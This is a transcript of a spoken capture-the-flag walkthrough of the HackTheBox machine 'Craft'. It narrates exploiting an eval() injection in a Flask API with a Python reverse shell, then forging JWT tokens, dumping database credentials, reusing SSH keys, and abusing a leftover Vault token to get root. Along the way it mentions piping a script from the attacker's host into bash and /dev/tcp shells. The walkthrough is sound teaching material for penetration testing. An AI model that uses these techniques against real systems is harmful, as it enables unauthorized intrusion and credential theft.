What's going on YouTube? This is Ipsec, and we're doing Craft from HackTheBox, and I really like this box because its story kind of guides you through the box without making it feel like it's holding your hand telling you what to do. You're presented with 3 web pages, the initial homepage, an API REST server, and a GOGS repository, which is essentially a host-it-yourself version of GitHub. So you look through the GOGS repository and you see the source code for the API. In addition to the source code, you see some issues that point out a RCE in the API because it's using a eval function. But you need authentication in order to access that vulnerable function. So you look through the closed issues and you see when they added authentication, and when they initially added authentication, they had hard-coded creds in a test file testing authentication. So you just grab that test file and it has all the authentication for you, throw in your RCE and get a shell on the server. Once you're on the server, you want to go into the database, and they have a bunch of dbtest files for you to use that you just replace the SQL command with the command you want to dump a list of all the users and passwords. And from there, you go back to the GOGS repository, access a private repo, which allows you to get some SSH keys to get into the box. And from there, the privesc is pretty simple, abusing a service called Vault. But that's enough talking. Let's just jump into the box. As always, we're going to begin with the nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it craft, and then the IP address, which is 10.10.10.110. This can take some time to run, so I've already ran it. Looking at the results, we have just 2 ports open, the first one being SSH on port 22, and its banner tells us it's a Debian box. We also have HTTPS on port 443, its banner tells us it's Nginx. We also have the nmap script running called ssl-cert, and it's saying the common name on the SSL certificate is craft.htb. So before I get too far, I'm just going to quickly take notes. Windows key Windows key left arrow to move that to the left side, Windows key right arrow to move cherry tree to the right, and then let's just press Control N to create a parent node, call it craft, Control Shift N to create a child node, and just call this notes. And we'll say host names, and this will be craft.htb, SSL cert to say how we got it. And then we'll say ports open and say 22 and 443. So just to be thorough and always to have recon running in the background, I'm going to do a second nmap with -b- to do all ports, -v for verbose, -oa I'll put all formats, nmap craft -all ports, and 10.10.10.110. Now I'm going to rename this window or pane to recon, create a new one, and let's go edit our host file and put the IP address we just had here. So 10.10.10.110 is going to be craft.htb. Save this, and then now we can go over and check the website. Navigating to HTTPS, craft.htb brings us to the certificate warning. Click Advanced, view certificate, and let's check if there's anything sensitive in here. So just going down this list, we can see there's a potential username, admin@craft.htb. So let's go back to cherry tree, create a new child node called users, and we'll say admin@craft.htb, and say we got it from an SSL cert. Okay. And then let's go see if there's anything else. The main thing I'm looking for is like alternative names, which could give us other host names. We don't really have that. It only has craft.htb. So let's accept the risk and continue. And then we get this web page. Doesn't look like there's too much information. Looking at the links, everything goes to craft.htb. There is this link to api.craft.htb, and I'm looking at the bottom left. And we have gogs.craft.htb. So let's go here and notes and say api.craft.htb and on root page. And then gogs.craft.htb, paste the same thing, and go to our host file again, and add these 2 hosts. So gogs.craft.htb, api.craft.htb. Save this, and let's go check these links out. So going to gogs, we get a certificate warning, accept the risk and continue, and then going over to API, accept the risk and continue. So it looks like these pages are taking a little while to load, so we'll just give it some time. And it looks like it's some type of documentation page. So we see the Craft API, and if we click on something like /brew, it gives us examples of how to use this API. If we click try it out, not sure. Maybe we have to be authenticated. So if we do auth login, click try it out, click execute, and we get a forbidden. So doesn't look like this auth check is working properly. Did I do auth check? I clicked on auth login. Click here. Okay, let's try login. Try it out, click execute, and it wants us to log into the page. So guest, it fails. But this is telling us that the API is doing an HTTP login, so that is useful to know. We can say api.craft.htb and uses HTTP login or authorization. So it's not in the post request, it's just a specific HTTP request for logging in. And we get unauthorized here. That's funny that when I click one, both of them expand. But until we have much information, this probably isn't going to help us. The models is explaining how the database works. But gogs is a, I guess, GitHub or package repository. So we can look at the gogs version, see it is 0.11.86, and its copyright is 2018. So I'm going to go and check searchploit on gogs, and then we can do -x to see the dates on these, to see what version is affected. Scrolling down, we see this CVE is 2014, so that's not going to be vulnerable since the copyright in ours is 2018. And we can take a look here and see if there's anything. And this one is also a 2014 CVE. So there's not much we can do with gogs right now. From doing previous HackTheBox machines, I believe if we get an administrative user, we may be able to get code execution via a post commit hook. But we don't really have an administrative user. We can try like administrator, and try brute forcing it, but that's not going to really do anything. So let's click on Explorer, and we have a repository here, the Craft API. So let's go and download this. So we can just go back to a terminal, git clone, paste this, and Git is giving us a certificate error. So let's go and Google git clone self-signed certificate and see if there's anything that will help us. Checking this Stack Overflow post, and it looks like there's git-c, and this will disable certificate verification. So paste this in, run this, and now we have downloaded the Craft API. But before we go manually through this, let's take a look back at the gogs page to fully enumerate this. And we do see there is an issue. We also see potential usernames. So I'm just going to look at the commit history, and we see Ahmed and Dinesh went here. So copy this, go here, and get some users. So Dinesh, I'm just going to type this so it's not a link, and this will be gogs, and then Bachman, gogs. Take a look at the issues. We have bogus ABV values, and the premise of this box is it's a bunch of people from Silicon Valley creating a brewery. So you can see Craft aims to be the largest repository of US-produced craft brews. So the bogus ABV values is saying, hey, is it possible to make it so we can't add ABV values that don't make sense? And we also have a curl command here that's giving us a token. So let's take a look at this token. This is a JWT token, and we can validate that by just running base64 against it. So notes, I'm just going to put JWT Token, paste, and let's base64 this. So if we copy, go here, echo-n, paste, base64-d, we see it's HS256, type JWT. The second value is going to tell us the data inside this token. So echo-n, paste this, base64-d. It's a user, and it expires at this epoch time. So let's copy this and epoch to date and see when this token expires. If it's still active, we can just probably replay this token and get access to the API, but it looks like it expired February 5th, 2019. So this token's not going to really help us. However, we may be able to brute force the signing, which is this piece. This piece is just pretty much a signing the first two pieces of this token. And if you get the secret that you used to sign, then you can forge your own JWT tokens. And I do that in another video. If you just go to probably ipsec.rocks and type in JWT, you can see me doing other JWT things. So definitely check out that video. I think it was Luke. But let's just try cracking it. So going into my cracking machine, if you don't have one, which you probably don't, just use your host computer. Don't use a VM because VMs are slow at cracking. So I'm going to go into hashcat hashes, and I'm going to create the file called craft. And I'm going to copy the token and paste it in. And then let's go in hashcat, and I'm going to do /hashcat. Then example hashes, and I'm going to pipe that to less. And I'm going to search for JWT. And it is mode 16500. So I'm going to do /hashcat-m 16500 hashes craft. I'm going to do opt wordlist rocku.text. And we can see it starting. And it's already ran through rocku.text. Didn't find anything. So we can just specify rules file because JWT tokens brute force really fast. So it may even be worth it to use like actual brute forces and do entire key spaces in case it's just like a random 8-character thing. But if it's more than like 10 characters, chances are you won't brute force it in any meaningful time, even if it is just random. So looking at this, this says it's going to take about an hour to do. So I'm just going to not use the dive rule set, and instead we'll use best64, which should finish relatively quickly. But this isn't actually crackable, so we won't really get anything. Just showing you kind of how quickly you can crack these hashes. So that's rocku on best64 finishes in like 20 seconds. So probably about the same speed as NTLM, maybe a bit slower, but that's that. That's trying to crack it. Doesn't work, so we can get out of the Kraken and move back on to what we're doing, and that is examining the issues. So he pastes this request, and we see that we can't replay the request because the JWT token's expired, and he's making a post and setting the ABV to 15. And he says this should just be rejected. So Ehrlich is asking him, hey, can you just do this? And Dinesh, being the crappy coder he is, does say, yep, the fix is live and working, and gives us the commit. And then Gilfoyle is saying, this should have been done in the database. Can you fix this bad patch before something awful happens? And looking at Dinesh's patch, we can see he's running eval on request.json ABV. So direct user input into eval means we have a code execution. So let's copy this thing, go over and go into craft and say this file and post this line. And I already copied the tabs. So that, and we can also put the commit. So let's see. Commit is right here. RCE And then if you wanted to be really thorough, you could press like Control-Shift print screen and then copy this and then go here and say this will be commit and paste the screenshot. So this would be handy if you're doing a report later to have pretty screenshots of everything. But let's go back and look at the issues. Looking at the closed, there is an issue from Gilfoyle asking to add authentication. And we didn't get Gilfoyle's username before. So let's copy this, go back into Cherry Tree, go to users, put Gilfoyle and say we got it from gogs. And let's take a look at this. So this is asking us to add authentication. And Gilfoyle is saying, hey, add auth. And Bachman is saying, okay, auth has been added. And this is actually going to a 404. So let's copy this, go to notes, and just say commit goes to 404. So let's analyze this whole Git repository locally. And you can do that with git log, which we will do, but let's pull some automated tools to do this first. So to do that, I just installed this Kali version, so I don't have Go or pip3 installed. So let's install those. So I'm going to do apt install golang to install Go. And while that runs, let's do make-dir-p home Go, and then we got to create 3 directories, which is package, bin, and source. And then let's go into our .profile and export go path is equal to home/go. We want to do go bin is equal to go path/bin. And then we need to update our path, and path is equal to path, then go bin. So if we did this in the Etsy, we'd add it for all users. Since we're doing this into our home directory .profile, we're only making this change for our user. And then we can do source stir.profile to load this. And now we have the go commands. But I'm going to do 2 tools. The second tool is going to be a Python tool. So let's install Python 3-dev and Python 3-pip. So while that installs, we can begin working on our Go install. And the first tool I want to install is GitLeaks. So search GitLeaks GitHub, and we can go and install this. So let's do go git-u to install this. And if you do -v, you can't do multiple dashes in one, -v-u, this tells you what it's doing as it installs. So we do have pip installed, so we can just do pip3 install TruffleHog. And this is just another tool I like to analyze these libraries with. So I'm just going to wait for GitLeaks to finish, and then we're beginning to analyze these Git repositories. So GitLeaks has been installed. We can just Control-D to get out of that. And if I search GitLeaks, I don't have it in my profile because I did the source command in that bottom pane. So I'm just going to do that again. And now we have the tool GitLeaks. So to run this, we just specified -v for verbose and --repo-path is equal to, we can say our current directory because we're inside the repo already. And we see no leaks detected. We can also run TruffleHog against this, and TruffleHog just wants the path. So I'm going to do the same thing I did before, and we don't have it finding anything. If you give TruffleHog a bad path, it errors out, so you know both of them did run on this. So let's just go manually take a look at this. So I'm going to do git log to view all commits, and I'm going to go through each one of these manually. So take the first one, git diff, paste this in, and that's head, and there's no difference between where we're at and where that was. So git diff on this one, and we'll see what has been added. This is adding a file called dbtest, and dbtest looks like it can run raw SQL commands. However, they did the connection parameters correctly, and everything's in variables, so just having this script doesn't leak the host, the user, the password, etc. We need to get this settings variable. So I'm just going to do find dot and grep for config or grep for settings, and we don't have any of those files. This git config is specific to the repository. So this is not in the file. If we do cat.git ignore, we can see settings.py is set to be ignored, so that's why it's not in this repository. So let's go take a look at the next one. Actually, before we do, we should take note that dbtest allows raw SQL commands to be ran. So commit 404, let's do dbtest, raw SQL command template, need creds. Okay. So git log, take a look at the next one. So I think that was A2. So let's do 10. Just going up. Yes, that was A2. So git diff 10. And let's see. This is the same dbtest I think we saw. So nothing there. Looking here, we do have credentials. So Dinesh and this password. So let's go over here, and users will do creds, and this is Dinesh with the password of that. So we can test this password out, but let's just go and finish analyzing everything. So let's do git log again and do the one after 1003. So I'm also going to add notes, and I'm going to take a new child node and say git harvesting and say Dinesh creds. So the next one is this fix, and based upon the comment, this looks like it's the fix that we saw in the issue. So going down, we just have this test.py. And this test.py was, I believe, what was added in the previous commit, but we don't have authentication here. So we can take a note at this, notes dbtest and test.py, and this will test issue number 2 with bogus ABV. And I'm taking a note of this because this will be useful for RCE as it's a good skeleton script. So skeleton script just means like it's got all the details there. So we won't have to create a script to authenticate to the API and then do all this stuff because the script's already here. So just reusing what the developer has. And then we have 2 more commits to go over. We got this for FD, git diff. Looking at this is the one where they added authentication. And looking at this, doesn't look like we have anything. So git log, and we'll do a git diff on the final one. This is the initialization. See if there's anything here. Does not look like anything. So we can get rid of this one commit because we already analyzed it. There wasn't anything interesting in that one. But we got dbtest.py and test.py and a credential. So let's take a look at the credential in user creds, Dinesh. We can try SSH Dinesh at 10.10.10, 110. Put the password in, and it does not work. If we go over back to a recon tab from a long time ago, we have a port 6022. And if we went to gogs and looked at the SSH, we have the SSH server for gogs running on port 6022. So we can try Dinesh's creds there, SSH Dinesh at 10.10.10, 110, and we need to specify port 6022. and it only lets public key authentication in. So there's nothing really there. We can try logging into Gogs. So Dinesh, paste the password, and now we can log in with Dinesh. Looking at his profile, we don't have anything unique here. And looking at settings, he's not an admin on Gogs. So there's nothing we can really do. We could potentially add a SSH key and then use this server as a pivot box. So if we do add key ipsec, and let's go here, make dir SSH, and we'll do SSH-keygen, and we'll call this Dinesh, cat dinesh.pub. We can copy this and paste the contents, add the key, and then chmod 600 on dinesh.pub. And there's two ways we can abuse this key. The easiest way is just go ssh config and say host dinesh-craft, and then host name is going to be 10.10.10.110. User is Dinesh. And then identity file is root HTTP, box is craft-sh Dinesh. So if we SSH to Dinesh-craft, we didn't specify the port. So port 6022. SSH in, and it just hangs. So I can do the squiggly period, that's that, and then period to exit the SSH session. And all you have really here is a way to do port forwarding. So if we do like -L, and we can specify 3306 and then localhost 3306 to try to forward it, but we don't really have any of the internal IPs yet, so SSH forwarding isn't really going to help us. If you want to know more about SSH forwarding, definitely check out the Reddish video, REDISH, because that's the one we do most of that stuff in. Let me make sure that's it. ipsec.rocks, REDISH. Yep, that's a box. So definitely check out that video if you want to do port forwarding. So I guess with all that, the only thing we can really do is check out test.py with the credentials we have. So let's go and see if this works. So in order to test this, we can just click on auth login and then click execute and try logging in with the creds, Dinesh, and then go here, grab the password, paste it in. And now if we execute on auth check, it looks like it's still getting forbidden. I don't know exactly how this test page works. Let's just try it out in test.py. So go into craft API, tests, and then he's got test.py. So let's put his credentials here. We can paste the password and paste the user, Python3, test.py, and we can see the message says token is valid. So over here, make sure the token is valid. He's printing the response, so this does craft a successful token with his username. The main thing I want to do right now is get rid of these annoying error messages like here. So to do that, let's just go edit the script again, go near the top, and then just specify request.packages.urllib3.disable warnings. And then we can run the script again, and we can see there are no more warning messages. So now we just have to find the code execution point. So let's go back to Cherry Tree and go to our notes, and we see that the execution point is in the ABV value, which is right here. So what we're going to do is create a command. So we're just going to do cmd is equal to, and because this is an eval, it should be on one line. So I'm doing this import statement this way because this is how you do an import on one line, essentially. So import OS and then system ping -c1 10.10.14.2 and then close it out. So what we do now is we just put cmd here for the 15, and this will put this Python code right there, and it should get evaled. So Python 3 test.py, and before we do that, let's do tcp dump -n-i ton0 icmp. Run this, logging in, and we get a single ping request. So now we know we have a way to get a shell in the box. So let's go and get a reverse shell. Oh, we knew we had code execution on the box, I should have said. So I'm going to search pentest monkey reverse shell cheat sheet, and we'll get a Python one-liner. So let's grab this, grab Python, and we don't need this -c, just grabbing all of this. And if we do cmd equals, and he uses double quotes, so I'm going to use single quotes. And we can try this again. We didn't edit our IP information, so we are 10.10.14.2 and port 9001 because I enjoy it being over 9000. But nc lvnp 9001 and run this again, and it doesn't actually work. And like I said before, eval likes things being on one line, or that's my best explanation. So I'm going to grep cmd out of test.py, and we're going to make this eval statement one line. So v shell.py, and I'm going to paste sc for shell code. Sc for shell code. I'm going to say equals and put this in 3 quotes because 3 quotes will span a line. I'm going to do :%s, semicolon, \r for return, and enter. And I'm just going to clear these lines up. So now this is just all on one line. And if I test this out with print sc, we can Python 3 shell.py, and it prints our shell. So what I want to do is do from base64 import b64 in code, and we're going to print b64 encode on sc, and let's see, a bytes like object is required, not string. So if I do sc.encode to convert this string to a bytes object in Python, we get this base64. So I'm going to copy this. Before I begin, let's just make sure everything's correct. 10.10.14.2 if config ton0 10.10.14.2. Okay. So let's go back into test.py, and we're going to change the cmd to be equal to import base64.b64 decode, and we're going to paste the string, and I'm also going to wrap this entire thing in an exec, which is just like eval. So I'm execing this entire script, and if we do Python 3 test.py, we get a shell. So the interesting thing is the shell isn't actually progressing forward. So whenever I get a web shell on a web server, I like going back to the web server and making sure I did not crash it. Because if it's completely single-threaded, you may hang the entire web server. So refreshing the page does have it come back. So I don't have to worry about hanging the web server. One interesting fact is this web shell is actually printing the standard out from the web server, but we can ignore that. So let's just get a proper shell with Python-c, import pty, pty.spawn, and then sh, that's again just output from the shell. I'm going to re-git this because I messed up typing and I couldn't control C without killing my whole script. So python-c import pty, pty.spawn, bin sh. Let's see, import. I screwed up the command again. For some reason, I can't type today. Import pty, pty.spawn, bin sh. There we go. And now background control Z, stty raw minus echo, enter, fg, enter, enter again. And now we got a proper shell. So what we can do is look in dbtest.py. And if we looked at our notes, dbtest lets us run raw SQL commands, but we need creds. However, we are now on this box, so we can go in craft API and cat settings.py. Oh man, it's got a lot of HTTP input. Cat settings.py. We can grab this, and I'm going to create a note. This is on api.craft.htb shell settings.py. And we can say how we got the shell. Got through abv code exec eval. Okay. And I guess if we wanted to be really thorough, we could cat craft API dbtest. And that's in tests and test.py head, and copy the command here just for notes. But now we have credentials into the database. So we could either try doing a tunnel into the database, or we can just edit the script. And editing the script, I believe, will be quicker. So that's what I'm going to be doing. So I'm going to copy dbtest.py into db2.py. And then if we do vi db2.py, let's fix a terminal real quick. So open a new pane, stty-a. I am 34 rows, 136 columns. So let's do here, stty rows. Did I say 34 or 32? 34. I'm on recon. I shouldn't have been in this row, but 34, and cols was 136. 136. So let's rename recon to shell. So now if I vi db2.py, my Vim session looks correct. And rows is just these, and columns goes up and down. So that's all we did with that. So now we can just edit this, and we can do potentially show tables. Let's try this first to see what tables are here. So we can do show tables and Python 3 db2.py. Tables in craft brew. If we do fetch all instead of fetch one, it will fetch everything. So we can also say for I in result 1, 2, 3, 4 print I to clean up the input a bit. So running this, we can see two tables, brew and user. So we could have also went through the code. If we go, let's see, where's Explorer? Here, dashboard, craft, and went into craft API, database, models, And we can see it defining the class user, which is going to be the database user. So user has ID and username. So 2 ways to do the same thing. But I'm going to yank this line, comment this, and we will do... Sometimes it's just missing my escape keystroke, which is weird. Select stir from users and run this command. Craft.users doesn't exist, and that's because it is user, I believe. There we go. And we get other usernames. So if I cat db2.py, run that again, I'm going to do Control-Shift print screen. I think I hit the wrong key. Control-Shift print screen. Copy. And we will go over here. Users, creds. And I will do new child node. SC for screenshot. And I'll call this db dump. Paste. And in creds, copy. From database. And we can try SSHing with all these creds in boxes, but that's not going to really do anything. Instead, let's try logging into gogs with them. So, one other thing before we log into gogs. If we go into the settings, cd craft API, cat settings, we have the craft API secret. So we could also validate that cracking would have worked if we had this. So we can go into Kraken, hashcat v test, paste this, and we can do /hashcat. I forget what mode it was. Hashcat -h example hashes less JWT 16500. So /hashcat mode 16500, and then we want to specify hashes craft and test. And we can see hashcat has successfully cracked that hash. So if this was a dictionary hash or a hash based upon a word, we probably would have cracked it earlier and been able to skip all that. But now, if they change their passwords, it doesn't really matter because we can craft our own tokens. So if we just do Python 3, import JWT, I don't have it. pip3 install JWT, and then Python 3 import JWT. We can say secret is equal to, man, that did not paste well. Secret is equal to this and this. G60. Okay. And now we can just create a token. So encoded JWT is equal to JWT.encode. And we have to specify the data we want to encode. So if we go back to notes, we can copy this. And we will do echo-n, paste, base64-d. We want to say user is user, and expiration is, we'll do current epoch time. Go here, copy, paste, and we'll change this to be 6. So this is going to be a super long-lived token. And then we do the secret, which is secret, and the algorithm is HS256. Okay. JWT has no method encode. JWT dot. Let's see. Did I do the wrong JWT? Or did it change in Python 3? pip3 install py.jwt. I think this is the method I want. Python 3 import JWT. Secret is not defined. Secret. There we go. Encoded JWT, and we have a token. So we can copy this. And if we go back to this page, do auth check. Let's see. Try it out. Okay, that's not working. I guess we should edit test.py. So craft API test. We'll cp test.py to be auth.py, v auth.py, and we'll say get rid of this. And all we have to do is test authentication. And we'll leave it at auth is equal to Dinesh. And then we will... Oh, wait. We don't have to even do that. We can delete this page, and token is equal to this. So if we do Python 3 auth.py, we get token is valid. So we just crafted our own token. And while I'm here, let's just try one thing that I actually haven't done. We'll do algorithm is equal to none, no secret. What if I just get rid of algorithm altogether? Let's see. Algorithm equals none. Do py.jwt, generate token without secret. What if I just specify nothing like that? Encoded JWT. Okay, that did it. So if I copy this, and we'll paste this in for the token. And run this again, we get token invalid or not found. So that's just a simple test on some JWT things, because if we look at this token again, we should see it say there's no signing. Base64-D, auth none. So if the application itself isn't hard-coded to make sure the algorithm's what it expects, then you'll be able to specify none and not sign anything. And sometimes the application will accept it if it's coded poorly. So that is that. I just want to specify none like this real quick. Okay. Yep, I did that correctly. So that whole path has been solved. So what can we do now? Where was I? Logging in with credentials on Gogs. So sorry for that detour. Hopefully you enjoyed it and learned something. So sign out. Refresh this page. Sign out. There we go. Sign in. And we can go back to creds. And we can try logging in with Erlich Bachman's. Copy, paste, sign in. Failed. Let's try Gilfoyle. Log in. And we get in as Gilfoyle. And we have a private repository called craft-infrastructure. And I'm also checking, and Gilfoyle is not an admin here either. So we can't create that post hook. But we have a bunch of interesting things on Gilfoyle's repository. So like last time, let's just copy this down to a box. So to do that, we have to go to his settings, and we will create an SSH key. So add key, and we can close out of this. bx kill pane, there we go. And we'll make this just bash again. So let's make dir, we already have SSH. So we'll do SSH-keygen, and we'll call this one Gilfoyle. chmod plus 600 Gilfoyle cat gilfoyle.pub, and let's copy this in. And if we go back here, ipsec, paste the key. It's kind of funny that he has a key for Anton in here. It's good lore from the show. But go into config, SSH config, and we'll copy this. I think 5, say Gilfoyle-craft user, Gilfoyle. Oh no, this is going to be Git because we want to use Git Gilfoyle. And how Git does it, you always use that username. It uses your SSH key to identify who you are. Because if we go back to his repository on craft infrastructure, we can see it's telling us to use the name SSH. So, gogs.craft.htb v. That should be fine. We can do git clone, and we can say Gilfoyle-gogs/craft-infra.git. That did not work. Let's just do this the correct way. Copy. Host name. Now we can git clone. There we go. So now we can go craft infra. I'm in the wrong directory. Let's move this into craft. And we can run a tools that we did before on this one. So we'll do git leaks, and we'll say the repo path is pwd, and no leaks detected, and we can do TruffleHog with file : // pwd. Oh, we're an API. cd craft-infra, git leaks, and we have one line. It is flagging on begin open SSH private key. So one leak detected with that tool. And we can try TruffleHog, and it looks like this gets more. So TruffleHog reason is high entropy. So it finds the SSH private key here. Also finds that SSH public key. And then finds a GPG key for something called vault. And this looks like it is a apt repository thing. So not the actual key for software, just repository adding it. So demo of those both tools. We could also do git log, and I guess we can look at each of them since there's only two. So disable the Vault UI is adding the secrets thing, so we can see Vault write SSH roles root OTP, which is probably root one-time pad, username root for all hosts. So once we get on this box, there's probably something interesting in Vault. And then we can look at infrastructure configs, git diff, and see all this. UI is set to false, and that does that secrets config thing again. So looking through this, the git leaks did tell us that there is a SSH key somewhere. We don't see it here, but if we do lsla, you can see that .ssh directory, and there's ID RSA. So lsla, it is currently, I believe, the wrong permissions. So chmod 600, ID RSA, and let's try this key with Gilfoyle at 10.10.10.110. It wants a passphrase, so let's see if he reuses his password. So take it from the database dump, paste it in, and we get a low privilege shell on this box. So the very first thing I do when I want to privesc is I want to run LinPEAS, which is Privilege Escalation Awesome Suite. So the reason why I didn't do it before was I was in a Docker container. If you looked at the / directory, you would have seen .dockerenv. So that's why I didn't do it before. So I probably missed a whole enumeration step there, just digging straight to the source. But we were in Docker. So if we re-exploit that box, I should have looked into this. Test, nclvmp, 9001, Python 3, test.py, craft API, test, lsla/, you see we're in Docker env, and looking at the IP address, it's 172.20.06. So missed all that doing it before, my bad, but now we are no longer in Docker. So let's run that script suite. It's in opt, privilege escalation awesome suite, LinPEAS, nclvmp 9001, and direct the script there. And let's do nc 10.10.14.2, 9001, pipe it to bash. We can probably do bash cat dev tcp 10.10.14.2, 9001, and pipe that to bash. Echo dev tcp 10.10.14.2, 9001, bash. Okay, let's just download or Python M simple HTTP server. There we go. Curl, okay, curl 10.10.14.2, 8000, and the script we want is linpeas.sh, pipe to bash. Sorry about before, I was drawing a blank on how to execute directly with bash. But this script shouldn't take too long to run. So that is now ran. We can go back up and go through all these results. So the cool thing about this is it highlights things we should look at. So going through shouldn't take too long. We just want to look at things in red. So no port scan capabilities found because NC is not there. Nothing there. Looking at processes running by root. We got app.py. So we could always check if we can modify app.py and maybe get code execution there, but nothing too interesting. Binary, cron jobs, user information, all users on the box. Looking at SSH, we can see root login is allowed. And there's also challenge response authentication. Whoops. And we have it set to use PAM. And looking at this, we have auth and having a specific log called vault SSH. And before we saw some things with vault in the Git log. So this is saying probably should look at vault quite a bit. We also have a file called vaulttoken in Gilfoyle. And looking at vault SSH files, we can see potential SSH key here. So just something weird, user local etc vault SSH helper. And we get another hostname, vault.craft.htb on port 8200. And I'm not going to look into this that much because looking through the git config said the user interface was disabled. So should definitely go look in Vault. So I had copied that Vault token to my clipboard. So just going to Google, we can say Vault token file and see exactly what this is. Goes to Vault project. And if we read this, it's kind of like a cached credential in Vault. So what you probably want to do is read these man pages and see how to use Vault. And you can say Vault SSH example and go to Vault project. And it gives you a command, Vault SSH -mode OTP user at that. And if we went back through that git config, but I'll probably just go through here, go to Vault, secrets.sh. You can see Vault write. He's writing the role, SSH role to Vault and saying the default user is root. So if we just do Vault and paste this, and user is going to be root at 127.0.0.1. Failed to get credential making API request. So let's do, it's weird. Let's see, vault list, cat.vaulttoken, vault SSH root at 127.0.0.1. So that worked. So it says the one-time pad for this session is this, and we can log in. And that is the box. So you may be thinking that is extremely silly, but that's just because of how Vault was configured to hard code or leave that authentication token there behind. So if we had not had that file, so if we do rm.vaulttoken, actually let's cat this first and do rm.vaulttoken and run this command again. So vault SSH root at 127.0.0.1. It doesn't have the token. So it just created that token that was saved, and that was the issue. Vault probably has some specific way that it wants you to log in. Let's see. Can I log in with this token? Permission denied. But you're supposed to log in legitimately with Vault, and then it gives you permission for a little while to access the database. So that was the issue. The file's supposed to be there, and that is the box. So hope you guys enjoyed. Take care, and I will see you all next week.